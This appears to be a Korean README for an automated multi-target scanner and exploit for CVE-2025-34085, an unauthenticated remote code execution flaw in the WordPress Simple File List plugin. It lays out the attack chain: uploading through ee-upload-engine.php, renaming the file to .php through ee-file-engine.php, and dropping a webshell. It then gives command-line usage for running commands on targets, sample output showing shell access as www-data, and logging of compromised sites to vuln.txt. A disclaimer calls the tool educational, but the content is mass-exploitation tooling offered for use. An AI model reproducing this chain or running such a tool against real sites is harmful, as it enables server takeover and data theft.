
CVE-2025-34085에 대한 자동화된 스캐너 및 익스플로잇으로, WordPress Simple File List 플러그인의 인증되지 않은 RCE입니다. 다중 대상 스캐닝, 웹쉘 업로드 및 원격 명령 실행을 지원합니다.
인증 없이 WordPress Simple File List 플러그인, 특히 CVE-2025-34085에 취약한 플러그인의 원격 코드 실행(RCE) 을 탐지하고 익스플로잇하기 위한 자동화 도구입니다.
대상 자동 정리 시스템과 멀티스레드를 지원하여 대규모 작업에 효율적입니다.
인증 없이 파일 업로드
/wp-content/plugins/simple-file-list/ee-upload-engine.php파일 이름을 .php로 변경
/wp-content/plugins/simple-file-list/ee-file-engine.php원격 페이로드 실행
python3 main.py -u http://target.com --cmd "id"
targets.txt 파일에 대상 목록을 한 줄에 하나씩 작성:
python3 main.py --cmd "uname -a"
| 인자 | 설명 |
|---|---|
-u | 단일 대상 (예: http://example.com) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
성공한 대상은 자동으로 vuln.txt 파일에 저장됩니다.
main.py — 메인 스크립트targets.txt — 대상 목록clean_targets.txt — URL 정규화 결과vuln.txt — 익스플로잇 성공한 대상 로그targets.txt의 이상한 문자 제거 및 URL 형식 수정WordPress 사이트 관리자는 다음을 권장합니다:
이 프로젝트는 학습 및 합법적인 테스트만을 위한 것입니다.
불법적인 목적으로 사용하는 경우 각 개인의 책임입니다.
Cyberlone Indonesia는 이 도구의 오용에 대해 책임을 지지 않습니다.
라이선스: MIT License
합법적이고 책임 있는 목적으로 자유롭게 사용, 수정 및 배포하십시오.
Cyberlone Indonesia
🛠️ 연구 및 익스플로잇 팀
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n
--cmd대상에서 실행할 명령 (기본값: id) |
--inline | 인라인 페이로드 사용 (?cmd= 매개변수 없음) |